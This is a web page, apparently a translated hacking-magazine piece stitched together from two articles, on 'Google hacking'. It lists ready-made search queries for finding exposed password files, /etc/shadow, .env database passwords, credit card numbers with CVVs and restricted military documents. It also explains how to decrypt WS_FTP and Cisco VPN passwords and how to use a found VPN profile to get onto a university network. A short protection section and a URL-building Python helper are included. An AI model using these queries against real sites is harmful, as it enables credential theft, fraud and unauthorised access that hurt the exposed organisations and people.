For example:</p> <p>At the time of writing, Google can search inside 13 file formats:</p> <ul><li>Adobe Portable Document Format (pdf)</li> <li>Adobe PostScript (ps)</li> <li>Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)</li> <li>Lotus Word Pro (lwp)</li> <li>MacWrite (mw)</li> <li>Microsoft Excel (xls)</li> <li>Microsoft PowerPoint (ppt)</li> <li>Microsoft Word (doc)</li> <li>Microsoft Works (wks, wps, wdb)</li> <li>Microsoft Write (wri)</li> <li>Rich Text Format (rtf)</li> <li>Shockwave Flash (swf)</li> <li>Text (ans, txt)</li> </ul><p>The <b>link:</b> operator shows all pages that link to the specified page. <br>It is always interesting to see how many places on the Internet know about you. We try:</p> <p>The <b>cache:</b> operator shows Google's cached copy of a page as it looked when Google last visited it. Take any frequently changing site and look:</p> <p>The <b>intitle:</b> operator searches for the specified word in the page title. <b>allintitle:</b> is its extension: it requires all the specified words to be in the title. Compare:</p> <p><b>intitle:flight to mars <br>intitle:flight intitle:to intitle:mars <br>allintitle:flight to mars</b></p> <p>The <b>inurl:</b> operator makes Google show all pages containing the specified string in the URL; <b>allinurl:</b> requires all the words to be in the URL. For example:</p> <p><b>allinurl:acid_stat_alerts.php</b></p> <p>This query is especially useful for those who do not have Snort: at least they can see how its ACID console works on a real system.</p> <h2>Google Hacking Methods</h2> <p>So, we have established that, by combining the operators and keywords above, anyone can collect the information they need and search for vulnerabilities. These techniques are often referred to as Google Hacking.</p> <h3>Site map</h3> <p>You can use the site: operator to see all the links Google has found on a site.
Usually, pages generated dynamically by scripts are not indexed along with their parameters, so some sites use ISAPI filters (URL rewriting) so that links look not like <b>/article.asp?num=10&dst=5</b> but use slashes instead: <b>/article/abc/num/10/dst/5</b>. This is done so that the site gets indexed by search engines at all.</p> <p>Let's try:</p> <p><b>site:www.whitehouse.gov whitehouse</b></p> <p>Google assumes that every page on the site contains the word whitehouse, and that is what we use to get all the pages. <br>There is also a simplified form:</p> <p><b>site:whitehouse.gov</b></p> <p>And the best part is that the folks at whitehouse.gov do not even know that we looked at the structure of their site, and even at the cached pages Google downloaded for itself. This can be used to study a site's structure and view its content without being noticed, at least for the time being.</p> <h3>Listing files in directories</h3> <p>WEB servers can show a listing of a directory instead of the usual HTML page. Usually this is done so that users can pick and download specific files. In many cases, however, the administrator had no intention of showing the directory's contents; it happens because of a server misconfiguration or because the directory has no index page. As a result, an attacker has a chance to find something interesting in the directory and use it. To find all such pages, note that they all contain the words index of in the title. But since not only such pages contain the words index of, we refine the query with keywords that appear on the listing pages themselves, giving queries like:</p> <p><b>intitle:index.of parent directory <br>intitle:index.of name size</b></p> <p>Since most directory listings are intentional, you may have a hard time finding accidental ones at first.
But at least you can use the listings to determine the WEB server version, as described below.</p> <h3>Getting the WEB server version.</h3> <p>Knowing the WEB server version is always useful before starting an attack. Again, thanks to Google, this information can be obtained without connecting to the server. If you look carefully at a directory listing, you will see the name and version of the WEB server displayed at the bottom of it:</p> <p><b>Apache/1.3.29 - ProXad Server at trf296.free.fr Port 80</b></p> <p>An experienced administrator can change this information (on Apache, <b>ServerTokens Prod</b> and <b>ServerSignature Off</b> remove the version from the signature, and <b>Options -Indexes</b> disables the listing altogether), but as a rule it is accurate. So, to get this information, it is enough to send the query:</p> <p><b>intitle:index.of server.at</b></p> <p>To get the information for a specific server, we refine the query:</p> <p><b>intitle:index.of server.at site:ibm.com</b></p> <p>Or, conversely, we look for servers running a specific version:</p> <p><b>intitle:index.of Apache/2.0.40 Server at</b></p> <p>An attacker can use this technique to find a victim: if, for example, he has an exploit for a certain version of the WEB server, he can find such servers and try the exploit on them.</p> <p>You can also get the server version from the pages that are installed by default with a fresh copy of the WEB server. For example, to see the Apache 1.2.6 test page, just type:</p> <p><b>intitle:Test.Page.for.Apache it.worked!</b></p> <p>Moreover, some operating systems install and start a WEB server during installation, and some users are not even aware of this.
Naturally, if you see that someone has not removed the default page, it is logical to assume that the computer has not been configured at all and is probably vulnerable.</p> <p>Try looking for IIS 5.0 pages:</p> <p><b>allintitle:Welcome to Windows 2000 Internet Services</b></p> <p>In the case of IIS you can determine not only the server version but also the Windows version and Service Pack.</p> <p>Another way to determine the WEB server version is to look for the manuals (help pages) and examples that may be installed on the site by default. Hackers have found quite a few ways to use these components to gain privileged access to a site, which is why they must be removed from a production site, quite apart from the fact that their presence reveals the server type and version. For example, let's find the Apache manual:</p> <p><b>inurl:manual apache directives modules</b></p> <h3>Using Google as a CGI scanner.</h3> <p>A CGI scanner, or WEB scanner, is a utility that searches a target server for vulnerable scripts and programs. These utilities need to know what to look for, so they carry a whole list of vulnerable files, for example:</p> <p><b>/cgi-bin/cgiemail/uargg.txt <br>/random_banner/index.cgi <br>/cgi-bin/mailview.cgi <br>/cgi-bin/maillist.cgi <br>/cgi-bin/userreg.cgi <br><br>/iissamples/ISSamples/SQLQHit.asp <br>/SiteServer/admin/findvserver.asp <br>/scripts/cphost.dll <br>/cgi-bin/finger.cgi</b></p> <p>We can find each of these files with Google by combining index of or inurl with the file name in the search bar, and so find sites with vulnerable scripts, for example:</p> <p><b>allinurl:/random_banner/index.cgi</b></p> <p>With additional knowledge, an attacker could exploit a flaw in such a script and make it serve any file stored on the server.
For example, a password file.</p> <h2>How to protect yourself from being hacked through Google.</h2> <h4>1. Do not upload important data to the WEB server.</h4> <p>Even if you post the data only temporarily, you may forget about it, or someone may find and take it before you erase it. Don't do it. There are many other ways to transfer data that protect it from theft.</p> <h4>2. Check your site.</h4> <p>Use the methods described here to research your own site. Check it periodically for the new methods that appear at http://johnny.ihackstuff.com. Remember that if you want to automate this, you need special permission from Google: if you read <a target="_blank" href="http://www.google.com/terms_of_service.html">http://www.google.com/terms_of_service.html</a> carefully, you will see the phrase: You may not send automated queries of any sort to Google's system without express permission in advance from Google.</p> <h4>3. You may not need Google to index your site or part of it.</h4> <p>Google allows you to remove a link to your site, or part of it, from its database, and to remove pages from the cache. In addition, you can prohibit image search on your site and prohibit the display of short page fragments (snippets) in search results. All the ways of removing a site are described at <a target="_blank" href="http://www.google.com/remove.html">http://www.google.com/remove.html</a>. To do this you must confirm that you really are the site's owner, or insert the robots meta tags on the page.</p> <h4>4. Use robots.txt</h4> <p>Search engines are known to look at the robots.txt file at the root of a site and not index the parts marked with the word <b>Disallow</b>. You can use this to keep part of the site out of the index.
For example, to keep the whole site out of the index, create a robots.txt file containing two lines:</p> <p><b>User-agent: * <br>Disallow: /</b></p> <p>Bear in mind that robots.txt is only a request to well-behaved crawlers: it restricts access to nothing, and a list of disallowed paths is itself a hint about what you consider sensitive, so it is no substitute for access control.</p> <h2>What else happens</h2> <p>So that life does not seem all sweet to you, I will say in conclusion that there are sites that track the people who use the methods above to look for holes in scripts and WEB servers. An example of such a page is</p> <h2>Appendix.</h2> <p>A little dessert. Try some of the following for yourself:</p> <p>1. #mysql dump filetype:sql - search for MySQL database dumps <br>2. Host Vulnerability Summary Report - shows you which vulnerabilities other people have found <br>3. phpMyAdmin running on inurl:main.php - finds exposed phpMyAdmin control panels <br>4. Not for distribution confidential <br>5. Request Details Control Tree Server Variables <br>6. Running in child mode <br>7. This report was generated by WebLog <br>8. intitle:index.of cgiirc.config <br>9. filetype:conf inurl:firewall -intitle:cvs - maybe someone needs firewall configuration files? :) <br>10. intitle:index.of finances.xls - hmm.... <br>11. intitle:Index of dbconvert.exe chats - ICQ chat logs <br>12. intext:Tobias Oetiker traffic analysis <br>13. intitle:Usage Statistics for Generated by Webalizer <br>14. intitle:statistics of advanced web statistics <br>15. intitle:index.of ws_ftp.ini - WS_FTP configuration <br>16. inurl:ipsec.secrets holds shared secrets - secret key - a good find <br>17. inurl:main.php Welcome to phpMyAdmin <br>18. inurl:server-info Apache Server Information <br>19. site:edu admin grades <br>20. ORA-00921: unexpected end of SQL command - reveals paths <br>21. intitle:index.of trillian.ini <br>22. intitle:Index of pwd.db <br>23. intitle:index.of people.lst <br>24. intitle:index.of master.passwd <br>25. inurl:passlist.txt <br>26. intitle:Index of .mysql_history <br>27. intitle:index of intext:globals.inc <br>28. intitle:index.of administrators.pwd <br>29. intitle:Index.of etc shadow <br>30.
intitle:index.of secring.pgp <br>31. inurl:config.php dbuname dbpass <br>32. inurl:perform filetype:ini</p> <p>Obtaining private data does not always mean hacking: sometimes it is simply published in the open. Knowing Google's settings, plus a little ingenuity, will let you find a lot of interesting things, from credit card numbers to FBI documents.</p> <h2>WARNING</h2>All information is provided for informational purposes only. Neither the editors nor the author are responsible for any possible harm caused by the materials of this article. <p>Everything is connected to the Internet today, with little care taken to restrict access, so a great deal of private data becomes prey for search engines. Spider robots are no longer limited to web pages: they index all content reachable on the Web and constantly add confidential information to their databases.
Learning these secrets is easy: you just need to know how to ask for them.</p><h2>Looking for files</h2> <p>In capable hands, Google quickly finds everything that lies badly on the Web, such as personal information and files for internal use. They are often hidden like a key under the doormat: there are no real access restrictions, the data just sits in the back of the site, where no links lead. Google's standard web interface provides only the basic advanced-search settings, but even those will do.</p> <p>There are two operators for restricting a Google search to files of a certain type: filetype and ext. The first selects the format the search engine determined from the file header, the second the file extension, regardless of the content. In both cases you specify only the extension. Originally the ext operator was convenient when the file had no specific format signature (for example, for searching ini and cfg configuration files, which can contain anything). Google's algorithms have since changed, and there is no visible difference between the operators: the results are the same in most cases.</p> <br><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359798_b3e1_filetype_ext.png' width="100%"><h2>Filtering the output</h2> <p>By default, Google searches for the words, and in general any characters entered, in all files on the indexed pages. You can narrow the search by top-level domain, by a specific site, or by where the desired sequence occurs within the files. For the first two, the site operator is used, followed by the domain name or the chosen site. In the third case, a whole set of operators lets you search in service fields and metadata.
For example, allinurl finds the given words in the links themselves, allinanchor in the anchor text of links, allintitle in page titles, allintext in the body of pages.</p> <p>Each of these operators has a lighter version with a shorter name (without the all prefix). The difference is that allinurl finds links containing all the words, whereas inurl finds links containing only the first of them; the second and subsequent words of the query may then appear anywhere on the page. The inurl operator also differs from another operator of similar meaning, site: inurl can match any sequence of characters in the link to the desired document (for example, /cgi-bin/), which is widely used to find components with known vulnerabilities.</p> <p>Let's try it in practice. We take the allintext filter and make the query return a list of credit card numbers and verification codes that expire only two years from now (or when their owners get tired of feeding everyone in sight).</p><p>allintext: card number expiration date /2017 cvv <br><img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359828_0660_cc_2017.png' width="100%"></p><p>When you read in the news that a young hacker "hacked into the servers" of the Pentagon or NASA and stole classified information, in most cases it is precisely this elementary technique of using Google. Suppose we are interested in a list of NASA employees and their contact details. Such a list surely exists in electronic form, and for convenience or through an oversight it may sit on the organization's own website. Logically, nothing will link to it, since it is intended for internal use. What words might such a file contain? At the very least, the field "address".
All these assumptions are easy to test.</p> <br><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359852_9681_google_inurl.png' width="100%"><p>inurl:nasa.gov filetype:xlsx "address"</p> <br><img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359864_215b_nasa_address.png' width="100%"><h2>We use bureaucracy</h2> <p>Such finds are a pleasant trifle. The really solid catch comes from a more detailed knowledge of Google's operators for webmasters, of the Web itself, and of the structure of what you are looking for. Knowing the details, you can easily filter the output and refine the properties of the files you need, so that what remains is really valuable data. It is funny that bureaucracy comes to the rescue here: it produces standard formulations that make it convenient to search for secret information that has accidentally leaked onto the Web.</p> <p>For example, the Distribution Statement marking, mandatory in the paperwork of the US Department of Defense, denotes standardized restrictions on a document's distribution. The letter A marks public releases containing nothing secret; B restricts distribution to US government agencies, C to government agencies and their contractors, and so on up to F. Separately there is the letter X, which marks export-controlled technical data releasable to eligible private individuals and enterprises. Let those whose job it is look for the really sensitive documents; we will limit ourselves to files with the letter C. According to DoDI 5230.24, this marking is assigned, among other reasons, to documents describing critical technologies that fall under export control.
Such carefully guarded information can be found on sites in the .mil top-level domain, which is allocated to the US military.</p><p>"DISTRIBUTION STATEMENT C" inurl:navy.mil <br><img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359886_8f3e_distribution_c.jpg' width="100%"></p><p>It is very convenient that the .mil domain contains only sites of the US Department of Defense and its contractors. Domain-limited search results are exceptionally clean, and the titles speak for themselves. Searching for Russian secrets this way is practically useless: chaos reigns in the .ru and .рф domains, and the names of many weapons systems sound botanical (the Kiparis submachine gun, the Akatsiya self-propelled gun) or even fairy-tale-like (the TOS Buratino, i.e. Pinocchio).</p> <br><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359901_5076_th-57c.jpg' width="100%"><p>By carefully examining any document from a .mil site, you can spot other markers to refine the search by, for example the reference to the export restrictions of "Sec 2751", which is also convenient for finding interesting technical information. From time to time such documents are removed from the official sites where they once appeared, so if an interesting link in the results no longer works, use the Google cache (the cache operator) or the Internet Archive.</p> <h2>We climb into the clouds</h2> <p>Besides accidentally declassified documents from government departments, the Google cache occasionally turns up links to personal files from Dropbox and other storage services that create "private" links to publicly accessible data. With alternative and home-made services it is even worse.
For example, the following query finds the data of all Verizon customers who have an FTP server enabled on their router and actively use it.</p><p>allinurl:ftp://verizon.net</p><p>There are now more than forty thousand such people, and in spring 2015 there were an order of magnitude more. Instead of verizon.net you can substitute the name of any well-known provider, and the better known it is, the larger the catch can be. Through the built-in FTP server you can see the files on an external drive connected to the router. Usually this is a NAS for remote work, a personal cloud, or some kind of peer-to-peer download. All the content of such media is indexed by Google and other search engines, so the files stored on these external drives can be reached by direct link.</p> <p><img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359919_7cea_allinurl_verizon_ftp.png' width="100%"></p> <h2>Peeping at configs</h2> <p>Before the wholesale migration to the clouds, simple FTP servers, which also had no shortage of vulnerabilities, ruled as remote storage, and many of them are still in use today. For example, the popular WS_FTP Professional program stores configuration data, user accounts and passwords in the file ws_ftp.ini. It is easy to find and read, because all entries are stored in plain text and the passwords are encrypted with the Triple DES algorithm after minimal obfuscation.
In most versions, simply discarding the first byte is enough.</p> <p><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359934_1d8d_ws_ftp-pwd.png' width="100%"></p> <p>Decrypting such passwords is easy with the WS_FTP Password Decryptor utility or a free web service.</p> <p><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359947_3060_ws_ftp-pwd_found.png' width="100%"></p> <p>When people talk about hacking an arbitrary site, they usually mean obtaining a password from logs and backups of the configuration files of a CMS or e-commerce application. If you know their typical structure, it is easy to pick the keywords. Lines like those found in ws_ftp.ini are extremely common. For example, Drupal and PrestaShop typically have a user ID (UID) and the corresponding password (pwd), stored in files with the .inc extension. You can search for them like this:</p><p>"pwd=" "UID=" ext:inc</p><h2>Revealing DBMS passwords</h2> <p>In the configuration files of SQL servers, user names and e-mail addresses are stored in clear text, and MD5 hashes are written in place of passwords. Strictly speaking, they cannot be decrypted, but you can look for a match among known hash-password pairs, and unsalted MD5 is cheap to brute-force.</p> <p><img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359963_9e67_sql_code.png' width="100%"></p> <p>To this day there are DBMSs that do not even hash passwords.
Their configuration files, which hold the password in clear text, can often simply be opened in the browser.</p><p>intext:DB_PASSWORD filetype:env</p><p><img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359975_d137_env.png' width="100%"></p> <p>With the advent of Windows servers, the place of configuration files was partly taken by the registry. Its exported branches can be searched in exactly the same way, using reg as the file type. For example:</p><p>filetype:reg HKEY_CURRENT_USER "Password"=</p><p><img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2015/07/1436359995_2ecf_reg.png' width="100%"></p> <h2>Don't Forget the Obvious</h2> <p>Sometimes you can get at classified information through data that was accidentally exposed and picked up by Google. The ideal case is to find a list of passwords in some common format. Only desperate people keep account details in a text file, a Word document or an Excel spreadsheet, but there are always enough of them.</p><p>filetype:xls inurl:password</p><p><img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2015/07/1436360015_16e4_xls.png' width="100%"></p> <p>On the one hand, there are many ways to prevent such incidents: set adequate access rights in .htaccess, patch the CMS, do not use dubious third-party scripts, and close other holes. There is also the robots.txt exclusion file, which asks search engines not to index the files and directories listed in it.
On the other hand, if the robots.txt on some server differs from the standard one, it immediately becomes clear what they are trying to hide there.</p> <p><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436360029_5da8_robots.png' width="100%"></p> <p>The listing of directories and files on any site is headed by the standard phrase index of. Since it must appear in the title for service reasons, it makes sense to restrict its search with the intitle operator. Interesting things can be found in the /admin/, /personal/, /etc/ and even /secret/ directories.</p> <p><img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2015/07/1436360054_2a7b_indexof.png' width="100%"></p> <h2>Follow the updates</h2> <p>Timeliness is extremely important here: old vulnerabilities are closed very slowly, but Google and its results change constantly. There is even a difference between the "last second" filter (&tbs=qdr:s at the end of the request URL) and the "real time" filter (&tbs=qdr:1).</p> <p>Google also implicitly records when it last updated a file. Through the graphical web interface you can pick one of the standard periods (hour, day, week and so on) or set a date range, but that way is not suited to automation.</p> <p>From the look of the address bar one can guess the way to limit results with the &tbs=qdr: construct. The letter y after it limits results to one year (&tbs=qdr:y), m to the last month, w to the week, d to the past day, h to the last hour, n to the last minute and s to the last second. The very newest results, which Google has only just learned of, are found with the &tbs=qdr:1 filter.</p> <p>If you need to write a tricky script, it is useful to know that a date range is set in Google in Julian format with the daterange operator.
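</p><p>As an added example (not code from either article), the following Python module converts ordinary calendar dates into the Julian day numbers the daterange: operator expects and assembles a search URL with the tbs=qdr:, as_filetype, cr and gl parameters the text describes. The parameter names and formats are taken as the article gives them, and nothing here sends a query to Google, whose terms of service forbid automated queries without permission.</p>

```python
"""Build Google search URLs with the date filters and URL parameters the
article describes. Added example, not from the original page.
Assumptions: the parameter names (q, tbs, as_filetype, cr, gl) and the
qdr:/daterange: formats are used exactly as the article gives them;
nothing here contacts Google."""
from datetime import date
from urllib.parse import urlencode

# Python's date.toordinal() counts days from 0001-01-01 == 1 (proleptic
# Gregorian); the Julian Day Number of that date is 1721426, so the JDN
# is the ordinal plus this offset.
_JDN_OFFSET = 1721425

# Units accepted after tbs=qdr: (the article's list) plus the "1"
# real-time filter it mentions.
_QDR_UNITS = {"s", "n", "h", "d", "w", "m", "y", "1"}


def _to_date(d):
    """Accept a date or an ISO string such as '2015-07-01'."""
    return d if isinstance(d, date) else date.fromisoformat(d)


def julian_day_number(d):
    """Integer Julian Day Number of a Gregorian calendar date."""
    return _to_date(d).toordinal() + _JDN_OFFSET


def daterange(start, end):
    """daterange:<jdn>-<jdn> for the inclusive range start..end."""
    s, e = _to_date(start), _to_date(end)
    if e < s:
        raise ValueError("end date precedes start date")
    return f"daterange:{julian_day_number(s)}-{julian_day_number(e)}"


def qdr(unit):
    """Value of the tbs= parameter: qdr:y, qdr:m, ..., qdr:s or qdr:1."""
    if unit not in _QDR_UNITS:
        raise ValueError(f"unknown qdr unit {unit!r}")
    return f"qdr:{unit}"


def search_url(query, *, filetype=None, country=None, gl=None, tbs=None,
               between=None, exclude=()):
    """Assemble a Google search URL from a query and optional refinements.

    between -- (start, end) dates, appended to the query as daterange:
    exclude -- words to drop from the results, appended as -word
    country -- two-letter code for cr=country<CC> (results from that country)
    gl      -- two-letter code for gl= (search as if from that country)
    """
    q = query
    if between:
        q += " " + daterange(*between)
    q += "".join(f" -{w}" for w in exclude)
    params = {"q": q}
    if filetype:
        params["as_filetype"] = filetype
    if country:
        params["cr"] = f"country{country.upper()}"
    if gl:
        params["gl"] = gl.lower()
    if tbs:
        params["tbs"] = tbs
    return "https://www.google.com/search?" + urlencode(params)


if __name__ == "__main__":
    # The article's own daterange example, rebuilt from calendar dates.
    print(search_url("confidential", filetype="pdf",
                     between=("2015-01-01", "2015-07-01")))
    print(search_url('intitle:"Index of /Personal/"',
                     exclude=("names", "tutorial", "banking"), tbs=qdr("m")))
```

<p>The first call reproduces the article's daterange:2457024-2457205 from the dates 2015-01-01 and 2015-07-01; the only arithmetic is the fixed offset between Python's day ordinal and the Julian day count, so no external date converter is needed.</p><p>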
For example, this is how to find a list of PDF documents containing the word confidential that were uploaded between January 1 and July 1, 2015.</p><p>confidential filetype:pdf daterange:2457024-2457205</p><p>The range is given as Julian day numbers without the fractional part. Converting them by hand from the Gregorian calendar is inconvenient; it is easier to use a date converter.</p> <h2>Targeting and filtering again</h2> <p>Besides adding operators to the search query, they can be passed directly in the URL. For example, the filetype:pdf operator corresponds to the as_filetype=pdf parameter. Any refinement can be set this way. Say, results only from the Republic of Honduras are selected by adding cr=countryHN to the search URL, and only from the city of Bobruisk by gcs=Bobruisk. See the developer section for the complete list.</p> <p>Google's automation is meant to make life easier, but often adds hassle. For example, the user's city is determined from the user's IP address via WHOIS. Based on this, Google not only balances load between servers but also changes the search results. Depending on the region, the same query puts different results on the first page, and some may be hidden altogether. To search as if from any country, append that country's two-letter code to the gl= parameter (gl=country). For example, the code for the Netherlands is NL, whereas the Vatican and North Korea have no code of their own in Google.</p> <p>Search results are often cluttered even after several advanced filters. In that case it is easy to refine the query by adding a few exclusion words (each preceded by a minus sign). For example, banking, names and tutorial often appear next to the word Personal. Therefore, a refined query gives cleaner results than the textbook one:</p><p>intitle:"Index of /Personal/" -names -tutorial -banking</p><h2>Last Example</h2> <p>A sophisticated hacker is distinguished by providing himself with everything he needs. For example, a VPN is convenient, but either expensive or temporary and restricted. Subscribing on your own is too expensive. Fortunately there are group subscriptions, and with Google's help it is easy to become part of a group. Just find a Cisco VPN configuration file, which has the rather unusual PCF extension and a recognizable path: Program Files\Cisco Systems\VPN Client\Profiles. One request, and you join, for example, the friendly staff of the University of Bonn.</p><p>filetype:pcf vpn OR Group</p><p><img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2015/07/1436360077_d28b_vpn.png' width="100%" loading="lazy"></p> <h2>INFO</h2><p>Google finds configuration files with passwords, but many of them are encrypted or replaced with hashes. If you see strings of fixed length, look straight away for a decryption service.</p><p>The passwords are stored in encrypted form, but Maurice Massard has already written a program to decrypt them and provides it for free through thecampusgeeks.com.</p> <p>With the help of Google, hundreds of different types of attacks and penetration tests are carried out. There are many options affecting popular programs, major database formats, numerous PHP vulnerabilities, clouds and so on. Knowing exactly what you are looking for makes it much easier to get the information you need (especially the information that was never meant to be public). Not only Shodan feeds interesting ideas, but any database of indexed network resources! 
</p> </div> </article> </main> </div> </div> </div> </body> </html>